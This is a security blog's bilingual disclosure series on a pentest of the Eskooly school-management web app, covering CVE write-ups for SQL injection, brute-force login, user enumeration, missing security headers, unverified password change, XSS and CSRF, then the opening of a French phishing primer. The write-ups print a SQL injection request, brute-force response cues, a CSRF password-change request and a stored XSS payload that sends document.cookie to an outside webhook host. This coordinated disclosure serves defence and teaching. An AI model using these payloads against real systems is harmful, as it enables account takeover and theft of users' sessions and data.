<figure><img src="/files/A018arYzEuEtNg1o61Dx" alt=""><figcaption></figcaption></figure>

## Dates

* Tests: Entre le 17 et 19 février 2024
* Rapport: Le 20 février 2024
* CVE Request: 05 Avril 2024
* Publication des failles: 02 Juillet 2024 (après validation du fournisseur ESKOOLY)

## L’histoire de la découverte des vulnérabilités dans Eskooly

### **Introduction**

J'ai toujours été passionné par la cybersécurité, et ce week-end du 17 et 18 février, j'ai eu l'opportunité de mettre en pratique mes compétences en dehors de mon travail quotidien. Un ami m'avait demandé de vérifier la sécurité d'une application de gestion scolaire gratuite qu'il avait trouvée, nommée Eskooly. Son inquiétude principale était la sécurité de l'application, notamment la possibilité pour des étudiants de voler des informations ou de modifier leurs notes.

### **Début de l'aventure**

L'idée m'a tout de suite plu. Un challenge de sécurité indépendant, c'était exactement ce dont j'avais besoin. J'ai donc décidé de consacrer mon week-end à cette tâche.

<div data-full-width="true"><figure><img src="/files/d3qxCqzeaCAq6Fdso9BE" alt=""><figcaption></figcaption></figure></div>

### **Utilisation des outils automatisés**

Pour commencer, j'ai utilisé plusieurs outils automatisés bien connus dans le domaine de la cybersécurité :

* [**BURP** (voir le tuto dans la Capsule 3)](/french/capsule-3-outils/burp-suite): Un outil pour tester les vulnérabilités web.
* **NMAP** : Un scanner de ports et de services.
* **SQLMAP** : Un outil pour détecter et exploiter les failles SQL.

Ces outils m'ont permis de gagner du temps en automatisant une partie des tests de sécurité. Cependant, l'automatisation a ses limites, et il est souvent nécessaire d'ajouter une couche de tests manuels pour découvrir des vulnérabilités plus complexes.

## **Découverte des vulnérabilités**

Après plusieurs heures de tests, j'ai commencé à trouver des failles intéressantes. Parmi les vulnérabilités critiques découvertes, voici quelques exemples :

* **SQL Injection** : Cette faille permettait d'interférer avec les requêtes SQL de l'application, donnant potentiellement accès à toute la base de données.
* **Broken Authentification**: Absence de politique de verrouillage de compte après plusieurs tentatives de connexion échouées, ce qui ouvrait la porte aux attaques par force brute.
* **Cross-site scripting (XSS)** : Permettait l'injection de scripts malveillants dans les pages web vues par d'autres utilisateurs, compromettant leurs comptes.
* **Configuration incorrecte des en-têtes de sécurité** : Absence de plusieurs en-têtes de sécurité essentiels pour protéger l'application contre diverses attaques.

Ces vulnérabilités exposaient des informations critiques telles que les identifiants et mots de passe en clair des utilisateurs de la plateforme, posant un risque majeur de sécurité.

## **Rédaction et soumission du rapport**

Le 20 février, j'ai rédigé un rapport de PENTEST complet détaillant toutes les vulnérabilités découvertes et les recommandations pour les corriger. Ce rapport a été envoyé directement au fournisseur d'Eskooly.

<div data-full-width="true"><figure><img src="/files/OsgeN30tuDSiKHpxFTpG" alt=""><figcaption></figcaption></figure></div>

## **Collaboration avec le fournisseur**

Le fournisseur m'a contacté dès le lendemain, le 21 février, pour discuter des findings. Il a accepté le rapport et a sollicité mon aide pour résoudre les problèmes identifiés.

<figure><img src="/files/ycl2HYVgEkFO8CyMI3FQ" alt=""><figcaption></figcaption></figure>

## **Publication des vulnérabilités**

Le 5 avril 2024, les vulnérabilités découvertes ont été publiées sur la plateforme CVE MITRE. Depuis lors, nous avons travaillé en étroite collaboration pour améliorer la sécurité de l'application. Le 2 juillet 2024, le fournisseur m'a donné son accord pour publier ces findings, ce qui permettra la validation et la publication officielle des CVE.

## **Conclusion**

Ce fut une expérience enrichissante de plonger dans ce projet de sécurité, de découvrir des vulnérabilités critiques, et de travailler avec le fournisseur pour les corriger. Dans les articles suivants, nous allons explorer plus en détail comment ces vulnérabilités ont été trouvées, exploitées, et surtout, comment y remédier.


# ESKOOLY (EN version)

<figure><img src="/files/A1LebRYA7A0ifmn2Ungn" alt=""><figcaption></figcaption></figure>

Dates

* Tests: Between February 17 and 19, 2024
* Reporting: February 20, 2024
* CVE Request: April 05, 2024
* Publication of vulnerabilities: 02 July 2024 (after validation by ESKOOLY)&#x20;

## Eskooly vulnerability discovery story

### **Introduction**

I've always been passionate about cybersecurity, and this weekend of February 17 and 18, I had the opportunity to put my skills into practice outside my day job. A friend had asked me to check the security of a free school management application he'd found, called Eskooly. His main concern was the application's security, in particular the possibility of students stealing information or modifying their grades.

### **The adventure begins**

I liked the idea right away. A cyberseurity challenge was exactly what I needed. So I decided to spend my weekend to the task.

<div data-full-width="true"><figure><img src="/files/d3qxCqzeaCAq6Fdso9BE" alt=""><figcaption></figcaption></figure></div>

### **Using automated tools**

To get started, I used several well-known automated tools in the cybersecurity field:

* [**BURP (see the tutorial in Capsule 3)**](/french/capsule-3-outils/burp-suite): A tool for testing web vulnerabilities.
* **NMAP**: A port and service scanner.
* **SQLMAP**: A tool for detecting and exploiting SQL vulnerabilities.

These tools enabled me to save time by automating some of the security testing. However, automation has its limits, and it is often necessary to add a layer of manual testing to discover more complex vulnerabilities.

## **Discovering vulnerabilities**

After several hours of testing, I began to find some interesting vulnerabilities. Among the critical vulnerabilities discovered, here are a few examples:

* **SQL Injection**: This flaw made it possible to interfere with the application's SQL queries, potentially giving access to the entire database.
* **Broken Authentication**: Lack of account locking policy after several failed login attempts, opening the door to brute-force attacks.
* **Cross-site scripting (XSS)**: Allowed the injection of malicious scripts into web pages viewed by other users, compromising their accounts.
* **Incorrect configuration of security headers**: Several security headers essential for protecting the application against various attacks were missing.

These vulnerabilities exposed critical information such as platform users' unencrypted logins and passwords, posing a major security risk.

## **Writing and submitting the report**

On February 20, I wrote a full PENTEST report detailing all the vulnerabilities discovered and recommendations for correcting them. This report was sent directly to the Eskooly vendor.

<div data-full-width="true"><figure><img src="/files/OsgeN30tuDSiKHpxFTpG" alt=""><figcaption></figcaption></figure></div>

## Collaboration with the supplier

The vendor contacted me the next day, February 21, to discuss the findings. He accepted the report and asked for my help in resolving the issues identified.

<figure><img src="/files/ycl2HYVgEkFO8CyMI3FQ" alt=""><figcaption></figcaption></figure>

## Publication of vulnerabilities

On April 5, 2024, the discovered vulnerabilities were published on the MITRE CVE platform. Since then, we've been working closely together to improve the application's security. On July 2, 2024, the supplier gave me the go-ahead to publish these findings, enabling the CVEs to be validated and officially published.

## Conclusion

It was a rewarding experience to dive into this security project, discover critical vulnerabilities, and work with the vendor to fix them. In the following articles, we'll explore in more detail how these vulnerabilities were found, exploited and, most importantly, how to remedy them.


# CVE-2024-27709 - SQL Injection in Eskooly Web Product v.3.0

<figure><img src="/files/9FcHTl4Q4Nyv1Ltren9y" alt="SQL Injection"><figcaption></figcaption></figure>

## **Introduction**

The application is vulnerable to SQL Injection, a critical security flaw that allows an attacker to interfere with the queries that an application makes to its database.&#x20;

Typically, it allows an attacker to view data that they are not normally able to retrieve, such as other users' data, or any other data that the application itself is able to access. In some cases, SQL Injection can even be used to execute administrative operations on the database, such as shutdown commands or data deletion.&#x20;

In the case of Eskooly application, all database has been dumped.

## **Discovery of the Vulnerability**

CVE-2024-27709 was discovered during a routine security assessment of Eskooly Web Product v.3.0. The vulnerability resides in the `allstudents.php` and `requestmanager.php` components of the application, specifically within the `searchby` and `id` parameters. These parameters were found to be improperly sanitized, allowing malicious input to manipulate SQL queries.

### **Technical Details**

An attacker can exploit this vulnerability by injecting arbitrary SQL code through the `searchby` parameter of the `allstudents.php` component and the `id` parameter of the `requestmanager.php` component. This allows the attacker to execute arbitrary SQL commands on the database, potentially leading to data exfiltration, unauthorized access, and even complete database compromise.

* A POST request to allstudents.php includes a searchby parameter that appears to be injectable, as indicated by the suspicious payload and the error message displayed.

```
POST /bb/allstudents.php HTTP/2
Host: eskooly.com
Cookie:
--SNIP--

--SNIP--

searchby=148999'+and+1%3d2%23&searchclass=
```

* An error message from the application suggests that the input from the searchby parameter is being interpreted as SQL code, indicating a lack of proper input sanitization.

<figure><img src="/files/EPoQGvdilW43YkXWVEXb" alt=""><figcaption></figcaption></figure>

* Using SQLMap, it was possible to retrieve the right payload and dump all information.

<figure><img src="/files/OKoKWPSaGeo7slGB8XAv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TX1ZQpdUuR7ol2nIOhHB" alt=""><figcaption></figcaption></figure>

## Risk

### Impact

**Critical.**&#x20;

SQLi permits attackers to get access to the database and dump sensitive data.&#x20;

### Likelihood

**High**.&#x20;

An attacker who created an account could easily exploit the SQL injection without requiring any additional privileges or user interaction using an automatic scanning tool.

## Recommendation&#x20;

To address the identified SQL injection vulnerability, it is recommended to implement parameterized queries for all database interactions. This approach separates the command structure from the data, ensuring that user input does not modify SQL execution. All user input should be configured as a consistent security measure.&#x20;

Although quote escaping and using stored procedures are common practices, they are not secure and should not be relied upon alone. It is essential to carry out regular updates and follow secure coding standards in the application's interactions with the database.

## References

* [**CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')** ](https://cwe.mitre.org/data/definitions/89.html)
* [**OWASP: SQL Injection**](https://owasp.org/www-community/attacks/SQL_Injection)
* [**OWASP: Injection Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)


# ESkooly - Broken Authentication

<figure><img src="/files/pvw7MyHNzIJ1ygB9O5zS" alt=""><figcaption></figcaption></figure>

## Introduction

&#x20;Authentication mechanisms are critical to securing any web application. Broken authentication vulnerabilities can lead to unauthorized access and privilege escalation, posing significant security risks. This post delves into the broken authentication findings from the Eskooly security report and explains the associated CVEs, highlighting how these vulnerabilities were discovered and their potential impacts.

## Broken Authentication Findings

The security assessment of Eskooly Free Online School Management Software v.3.0 revealed several critical vulnerabilities under the category of "Broken Authentication." These vulnerabilities include issues like weak password policies, lack of multi-factor authentication (MFA), inadequate account lockout mechanisms, and improper handling of user accounts and HTTP response headers.

### Key Findings

1. Brute Force Attack

* Description:&#x20;

The system allows unlimited login attempts without locking out the account after several failed attempts, making it vulnerable to brute force attacks.&#x20;

* Impact:&#x20;

An attacker can repeatedly attempt passwords until they find the correct one, leading to unauthorized access.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/french/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

An attacker can perform a brute-force attack on the login endpoint, trying different password combinations until successful.&#x20;

2. Weak Password Policy&#x20;

* Description:&#x20;

The application enforces weak password policies that do not require complex passwords, making it easier for attackers to guess passwords.&#x20;

* Impact:&#x20;

Increases the likelihood of successful brute-force and dictionary attacks.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/french/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

Registering and logging in with simple passwords like "123456" or "password" allows attackers to easily compromise accounts.&#x20;

3. No Account Lockout

* Description:&#x20;

The system does not lock accounts after multiple failed login attempts, allowing attackers to persist in brute force attacks.&#x20;

* Impact:&#x20;

Facilitates unauthorized access through persistent password guessing.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/french/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

An attacker can continually attempt to guess passwords for a user account without being locked out, eventually succeeding.&#x20;

4. Use of Single-Factor Authentication

* Description:&#x20;

The application relies solely on passwords for authentication, lacking the additional security provided by multi-factor authentication (MFA).&#x20;

* Impact:

Single-factor authentication makes it easier for attackers to gain access if passwords are compromised.&#x20;

* Linked CVE[: ](#introduction)

  * [**CVE-2024-27710**](#introduction)&#x20;

* Example Exploitation:&#x20;

An attacker who acquires a user's password through phishing or social engineering can log in without needing a second form of verification.&#x20;

5. Inadequate Password Update Verification

* Description:&#x20;

The system allows password changes without verifying the current password, making it easier for attackers to change user passwords if they gain initial access.&#x20;

* Impact:&#x20;

Facilitates account takeover if attackers can initiate password changes without the current password.&#x20;

* Linked CVE:&#x20;

  * CVE-2024-27715&#x20;

* Example Exploitation:&#x20;

An attacker logged in with a compromised session can change the account password without needing the original password, locking out the legitimate user. Impact of These Vulnerabilities:&#x20;

## Conclusion

The combined impact of these broken authentication vulnerabilities is severe. They allow attackers to:

Gain unauthorized access to user and administrative accounts. Escalate privileges within the application. Compromise sensitive user data and application integrity. Perform unauthorized actions, such as modifying or deleting data.


# CVE-2024-27710 - Privilege Escalation via Authentication Mechanism in Eskooly Web Product <= v3.0

<figure><img src="/files/1mf6QoSKDz4c5WUtOwQU" alt=""><figcaption></figcaption></figure>

## Introduction

A brute force attack involves systematically trying various password combinations against a server. Methods include dictionary and traditional brute-force attacks, using different character sets. The attack's duration depends on the chosen method and the efficiency of both attacking and targeted systems.

This attack is particularly effective against applications with weak security, such as those with poor password policies, no account lockout after multiple failed attempts, and no multi-factor authentication. These vulnerabilities allow attackers to persistently guess passwords, increasing the likelihood of a successful breach, in the Eskooly application.

## **Discovery of the Vulnerability**

CVE-2024-27710 was discovered during a security assessment of Eskooly’s authentication processes. The issue was identified as part of the broken authentication findings, particularly related to the lack of multi-factor authentication (MFA) and weak password policies.

### Related Findings

* Brute Force Attack
* Weak Password Policy
* No Account Lockout

### **Technical Details**

The vulnerability arises from insufficient security measures in the authentication process. Specifically, the absence of MFA and the use of weak passwords allow attackers to exploit authentication mechanisms. Attackers can perform brute-force attacks or use session hijacking techniques to gain unauthorized access.

#### Login password

* Preparation of the attack: Capture the POST request to signin

```
POST /bb/signin.php HTTP/2
HOST: eskooly.com
--SNIP--

--SNIP--

s=EMP&username=TEST&password=a&submit=
```

Now check the difference between bad password and the right one:

* &#x20;Bad Password
  * Status code 200 and 12169 < Length < 12192

<figure><img src="/files/PymOXbYxPS3XIshzyNMB" alt=""><figcaption></figcaption></figure>

* Correct password
  * Status code 302-Found and Length < 12169

<figure><img src="/files/OpfQgIVsuyYQCQUd3MwD" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**Critical.**&#x20;

If an attacker successfully guesses a user's password due to the lack of an account lockout policy, the impact can be considerable. The attacker would gain unauthorized access to the user's account, employees or admin. This unauthorized access could lead to data breaches, identity theft, and other malicious activities. The impact is heightened by the potential for the attacker to access not just a single account, but multiple accounts, especially if password practices across users are weak or uniform.&#x20;

### Likelihood&#x20;

**High.**

The absence of an account locking mechanism, combined with weak password policies and the absence of multi-factor authentication, considerably increases the probability of a successful brute force attack. The attacker, who is not bothered by the threat of account locking, can relentlessly attempt to guess the password, a situation further accentuated by simplistic or predictable passwords. The ease with which these attacks can be carried out, often using automated tools, further amplifies the risk of security breaches.

## Recommendation

It's recommended to:

* Implement a robust account lockout policy: After a certain number of unsuccessful login attempts, the account should be temporarily locked. This prevents continuous password guessing by an attacker.
* Enforce strong password policies: Require complex passwords that include a mix of uppercase and lowercase letters, numbers, and special characters. Regularly prompt users to change their passwords and prevent the reuse of old passwords.
* Enable multi-factor authentication (MFA): Adding an additional layer of security beyond just a password significantly reduces the risk of unauthorized access. Even if a password is compromised, the attacker would still need the second factor to gain access.
* Monitor and limit login attempts: Keep track of failed login attempts and set a threshold after which additional security measures are triggered, such as CAPTCHA verification or requiring additional authentication.
* Implement network-level security measures: Use firewalls and intrusion detection systems to monitor and block repeated login attempts from the same IP address.

## References

* [**CWE-307: Improper Restriction of Excessive Authentication Attempts**](https://cwe.mitre.org/data/definitions/307.html)&#x20;
* [**OWASP: Testing for Weak Lock Out Mechanism** ](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism)
* [**OWASP: Blocking Brute Force Attacks**](https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks)


# CVE-2024-27711 - User Enumeration via Sign-up Process in Eskooly Web Product <= v3.0

<figure><img src="/files/R8KSaNGGYIODYLJii0eg" alt=""><figcaption></figcaption></figure>

## Introduction

Username enumeration is a common application vulnerability which occurs when an attacker can determine if usernames are valid or not. Most commonly, this issue occurs on login forms, where an error like “the username is invalid” is returned.

In this context, a student could enumerate VALID teacher account and using the CVE-2024-27710 he will escalate his/her privilege in the application.

## **Discovery of the Vulnerability**

CVE-2024-27711 was identified during a thorough security assessment of Eskooly’s user management and sign-up processes. The issue was found in the account settings where attackers could exploit the sign-up function to gain unauthorized access.

### Related Findings

* User Enumeration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

#### User enumeration during the Sign up

* It’s possible to enumerate admin account

<figure><img src="/files/BppKXKWOqcZ9FDm7kvYi" alt=""><figcaption></figcaption></figure>

Using this information and the findings related to CVE-2024-27710, a user/student could escalate his/her privilege and get admin access.

## Risk&#x20;

### Impact

**Medium.**&#x20;

The impact is high as the enumeration itself doesn't grant access but with all broken authentication vulnerabilities increases the risk of targeted attacks.

### Likelihood&#x20;

**High.**

Username enumeration in the Eskooly Web application is highly likely due to the explicit error message indicating existing usernames. Attackers can easily use this information to identify valid user accounts, which is a preliminary step in many attack vectors.

## **References**

* [**CWE-203: Observable Discrepancy**](https://cwe.mitre.org/data/definitions/203.html)
* [**OWASP: Testing for Account Enumeration and Guessable User Account**](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account)


# CVE-2024-27712 - User Enumeration via Account Settings in Eskooly Web Product <= v3.0

<figure><img src="/files/FvlGPXOnISDGUvOA0x1P" alt=""><figcaption></figcaption></figure>

## Introduction

Username enumeration is a common application vulnerability which occurs when an attacker can determine if usernames are valid or not. Most commonly, this issue occurs on login forms, where an error like “the username is invalid” is returned.

In this context, a student could enumerate VALID teacher account and using the CVE-2024-27710 he will escalate his/her privilege in the application.

## **Discovery of the Vulnerability**

CVE-2024-27711 was identified during a thorough security assessment of Eskooly’s user management and sign-up processes. The issue was found in the account settings where attackers could exploit the sign-up function to gain unauthorized access.

### Related Findings

* User Enumeration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

#### User enumeration during the Sign up

* It’s possible to enumerate admin account

<figure><img src="/files/zFibRMqyAqumAsNop4uc" alt=""><figcaption></figcaption></figure>

Using this information and the findings related to CVE-2024-27710, a user/student could escalate his/her privilege and get admin access.

## Risk&#x20;

### Impact

**Medium.**&#x20;

The impact is high as the enumeration itself doesn't grant access but with all broken authentication vulnerabilities increases the risk of targeted attacks.

### Likelihood&#x20;

**High.**

Username enumeration in the Eskooly Web application is highly likely due to the explicit error message indicating existing usernames. Attackers can easily use this information to identify valid user accounts, which is a preliminary step in many attack vectors.

## **References**

* [**CWE-203: Observable Discrepancy**](https://cwe.mitre.org/data/definitions/203.html)
* [**OWASP: Testing for Account Enumeration and Guessable User Account**](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account)


# CVE-2024-27713 - Protection mechanism Failure in Eskooly Web Product <= v3.0

<figure><img src="/files/lgpXwcHPLZcMQkyuD0Og" alt=""><figcaption></figcaption></figure>

## **Description**

Eskooly web application does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

### Related Findings

* Security Headers Misconfiguration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

1. 8 Security headers are missing

<figure><img src="/files/Q0gObZ5m5tj66UVw84Sk" alt=""><figcaption></figcaption></figure>

2. No cookie protection

<figure><img src="/files/EkoQl1bjdTgfeReIRi0r" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**Medium.**&#x20;

The absence of critical security headers such as X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security, and others significantly increases the website's vulnerability to several types of attacks. Without X-Frame-Options, the site is susceptible to clickjacking attacks, where an attacker could trick a user into clicking on something different from what the user perceives, potentially leading to unauthorized actions. The lack of X-Content-Type-Options exposes the site to MIME type confusion attacks, where the browser might execute non-executable MIME types, leading to cross-site scripting (XSS) or other code execution attacks. Furthermore, not implementing Strict-Transport-Security can allow attackers to intercept or alter communications between the user and the website, compromising confidentiality and integrity. Each missing header contributes to an overall weakened security posture, making sensitive data and user interactions more prone to interception and manipulation.

### Likelihood&#x20;

**High.**

The likelihood of an exploit resulting from these misconfigurations is high, considering the prevalent use of automated tools and scripts that detect and exploit such vulnerabilities. The specific details of the website's traffic, user base, and content type can further influence this likelihood. High-profile or high-traffic websites are particularly attractive targets, increasing the probability of attacks. The simplicity of executing attacks like clickjacking, MIME sniffing, or SSL stripping (in the absence of HSTS) means that even less sophisticated attackers could successfully compromise the website's security. Moreover, the absence of policies like Permissions-Policy and Cross-Origin-Resource-Policy opens up additional avenues for unauthorized access and data theft, making it more likely that such vulnerabilities will be exploited if not promptly and adequately addressed.

## Recommendation

<figure><img src="/files/nOIB9lPjep0CE5lqHZcX" alt=""><figcaption></figcaption></figure>

## **References**

* [**OWASP: Secure Headers Project**](https://owasp.org/www-project-secure-headers/)
* [**CWE-693: Protection Mechanism Failure**](https://www.google.com/search?q=CWE-693%3A+Protection+Mechanism+Failure\&sourceid=chrome\&ie=UTF-8)
* [**OWASP: HTTP Security Response Headers Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html)


# CVE-2024-27715 - Inadequate Password Update Verification in Eskooly Web Product <= v3.0

<figure><img src="/files/hs8A48hSGYhtORKaZgfs" alt=""><figcaption></figcaption></figure>

## Introduction

Eskooly application's current process for updating passwords is insufficiently secure, as it only requires users to enter a new password and its confirmation, without asking for the current (old) password.

### Related Findings

* Broken Authentificaton
  * Weak password
  * Brute Force
  * Inadequate Password Update Verification

### **Technical Details**

1. Update Admin password

<figure><img src="/files/9zcRWrZiaiR5ng7fMiyC" alt=""><figcaption></figcaption></figure>

2. Update Teacher/Student

<figure><img src="/files/vxg4380cmOe4Tkf8cZHl" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

Given that the application hold critical and sensitive data, the impact of this vulnerability is extremely High. Successful exploitation allows attackers full access to all stored credentials, leading to potential identity theft and unauthorized access to various services. The ability to change passwords without the original one could lead to account takeovers and significant data breaches.

### Likelihood&#x20;

**High.**

The likelihood is medium because to exploit this vulnerability, the attacker must have access to the victim's current session, e.g. the victim has left his browser session open. The attacker will therefore be able to modify the victim's password without knowing the original.

## Recommendation

It is recommended to enhance the password update process by requiring users to input their current password before setting a new one. This step adds a crucial verification layer to ensure that only authorized users can change passwords.

## **References**

* [**A07:2021 – Identification and Authentication Failures** ](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)
* [**CWE-620: Unverified Password Change**](https://cwe.mitre.org/data/definitions/620.html)


# CVE-2024-27716 - Cross-site Scripting (XSS) in Eskooly Web Product <= v3.0

<figure><img src="/files/SfWMTtKloXtadJvsH6Mw" alt=""><figcaption></figcaption></figure>

## Introduction

Cross-Site Scripting (XSS) vulnerabilities are a common and serious threat to web applications, allowing attackers to inject malicious scripts into web pages viewed by other users. This post explores CVE-2024-27716, a critical XSS vulnerability in Eskooly Web Product v.3.0 that enables attackers to execute arbitrary code via message sending and user input fields.

## Discovery of the Vulnerability

A Cross-Site Scripting (XSS) attack consist in the injection of malicious scripts in websites pages. Such attack is useful to execute attacker stored malicious code, generally in the form of a browser side script, in a victim browser when this latter is viewing the affected page. Several XSS payloads exists to steal victim cookies or any other legitimate user browser information.&#x20;

In the application:

* it is possible to trigger a malicious XSS through messages send to Admin or Teacher (to steal a cookie for example), it’s a STORED XSS.
* it is possible to trigger a reflected XSS through a lot of boxes (student name, phone number, teacher,…)

### Related Findings

* Cross-Site Scripting (XSS)
  * Stored XSS
  * Reflected XSS

### **Technical Details**

The vulnerability arises from insufficient input sanitization and validation. Specifically, user inputs are not properly escaped or sanitized before being included in the HTML content of web pages, allowing attackers to inject and execute malicious scripts.

#### Stored XSS&#x20;

1. Shows an attacker (teacher or student for example) crafting a message with a malicious script that is designed to be stored and later executed.

* The payload:

```
<img src="XXXXXXX.jpg" onerror="var i=new Image; i.src='https://webhook.site/ede9XXXXXXXXXX/?'+document.cookie;" />
```

<figure><img src="/files/HKdL7HA1WTyyFgwdeQFJ" alt=""><figcaption></figcaption></figure>

2. Admin received the message

<figure><img src="/files/SUWWrfbTUEnBWwDmX5ms" alt=""><figcaption></figcaption></figure>

3. The request details of the stored XSS payload show that a request was made to an external domain, indicating that the malicious script has been executed and data, such as cookies, might have been exfiltrated.

<figure><img src="/files/UseZcqWsGWs6Cef3cMjl" alt=""><figcaption></figcaption></figure>

Also, the server does not appear to set any flags on the cookie, such as HttpOnly or Secure, which are critical for protecting the cookie from being accessed by client-side scripts or transmitted over non-HTTPS connections. (See [**CVE-2024-27713**](/french/eskooly-cve/cve-2024-27713-protection-mechanism-failure-in-eskooly-web-product-less-than-v3.0))

#### Reflected XSS

1. An alert box displays sensitive session information, indicating that the script execution can access and potentially exfiltrate user data.

<figure><img src="/files/P0Tj35VV4S7dKyXyFTgU" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

The attacker could potentially perform actions on behalf of the victim, access sensitive information, and compromise user accounts.

### Likelihood&#x20;

**High.**

The likelihood of exploitation for a XSS vulnerability is high due to its remote exploitability, low attack complexity, lack of required privileges, and the prevalence of known exploits. Especially in the context of the application, where it's possible to steal admin or teacher cookies as student.

## Recommendation

It's recommended to implement rigorous user input validation to treat all inputs as untrustworthy and apply strict semantic and syntactic checks, use data pattern whitelists and blacklists, and uniformly sanitize data from all users. Additionally, encoding dynamic content in HTTP responses is crucial to prevent misinterpretation as executable content, with special characters converted to HTML entity encodings for safe processing. Furthermore, deploying a robust Content Security Policy (CSP) is essential to control script sources and execution on web pages, thereby effectively mitigating potential reflected XSS attacks.

## **References**

* [**OWASP: Cross Site Scripting (XSS)**](https://owasp.org/www-community/attacks/xss/)
* [**OWASP: Cross Site Scripting Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
* [**CWE-931: OWASP Top Ten 2013 Category A3 - Cross-Site Scripting (XSS)**](https://cwe.mitre.org/data/definitions/931.html)


# CVE-2024-27717 - Cross-Site Request Forgery (CSRF) in Eskooly Web Product <= v3.0

## Introduction

Cross-Site Request Forgery (CSRF) vulnerabilities are a significant threat to web applications, allowing attackers to perform unauthorized actions on behalf of authenticated users. This post explores CVE-2024-27717, a critical CSRF vulnerability in Eskooly Free Online School Management Software v.3.0 that enables attackers to escalate privileges via the Token Handling component.

## Discovery of the Vulnerability

CVE-2024-27717 was discovered during a detailed security assessment of Eskooly's web application. The vulnerability was identified in the token handling mechanism, where the application fails to implement sufficient measures to protect against CSRF attacks.

### Related Findings

* Cross-site Request Forgery

### **Technical Details**

The vulnerability arises from the lack of anti-CSRF tokens and improper handling of user sessions. Specifically, the application does not use unique, unpredictable tokens in state-changing requests, allowing attackers to trick authenticated users into performing unintended actions.

### Example of Impact

The impact of CVE-2024-27717 includes:

* Unauthorized actions performed on behalf of authenticated users.&#x20;
* Potential for attackers to escalate privileges and compromise user accounts.&#x20;
* Increased risk of data breaches and unauthorized data manipulation.&#x20;
* Compromise of sensitive user information and application integrity.

## Eskooly Application&#x20;

1. Update the account and password

-> POST Request:

```
POST /bb/account.php HTTP/2

Host: eskooly.com
--SNIP--

--SNIP--
email=HERE@MAIL.COM&password=1&timezone=Asia%2FKarachi&currency=2&symbol=%24&changepassword=

```

2. Craft the payload with the new mail and password

<figure><img src="/files/Ir6f5GtVjqi28CDmVeVC" alt=""><figcaption></figcaption></figure>

3. Send to admin and the victim triggered the attack

<figure><img src="/files/tFLMLp92IfwqKx1QnW55" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**High.**&#x20;

The impact is high due to the nature of the actions that can be performed. Changing a user's password via CSRF can lock legitimate users out of their accounts and give attackers unauthorized access.

### Likelihood&#x20;

**High.**

In this specific context, where a CSRF attack allows password updates or change email of the victim, the likelihood is high.

## Recommendation

It’s recommended to:

1. Implement Anti-CSRF Tokens: Use unique, unpredictable anti-CSRF tokens in all forms and state-changing requests. These tokens ensure that only requests originating from your own website are accepted, effectively blocking forged requests from other sites.
2. SameSite Cookie Attribute: Utilize the SameSite attribute in cookies to restrict their sending to only first-party contexts, reducing the risk of CSRF attacks.

## **References**

* [**CWE-352: Cross-Site Request Forgery (CSRF)**](https://cwe.mitre.org/data/definitions/352.html)
* [**OWASP Top Ten 2013 Category A8 - Cross-Site Request Forgery (CSRF)**](https://cwe.mitre.org/data/definitions/936.html)
* [**OWASP: Cross-Site Request Forgery Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)


# Phishing

Cette première partie définira le phishing, expliquera son origine ainsi que son évolution au cours des années, et donnera les indications pour se protéger et détecter une attaque.

## Définition et Contexte

{% hint style="success" %}
Le **phishing**, ou **hameçonnage** en français, est une cybercriminalité dans laquelle une ou plusieurs cibles sont contactées par courrier électronique, téléphone ou SMS par une entité se faisant passer pour une institution ou une personne légitime afin d'inciter les individus à fournir des données sensibles telles que des informations d'identification personnelle, des données bancaires ou de carte de crédit, et des mots de passe.&#x20;
{% endhint %}

![](/files/-MkK8iSfvgjiZWIClR5W)

Ces informations sont ensuite utilisées pour accéder à des comptes importants et peuvent entraîner une usurpation d'identité et des pertes financières.&#x20;

Afin d'éviter d'être vous-même la proie de ces escroqueries, il est utile d'avoir une connaissance de base de leur histoire, de comprendre le fonctionnement et surtout de reconnaitre une attaque de ce type.

## Table des matières

| Titre                                                                            | Description                                                                                                                          |
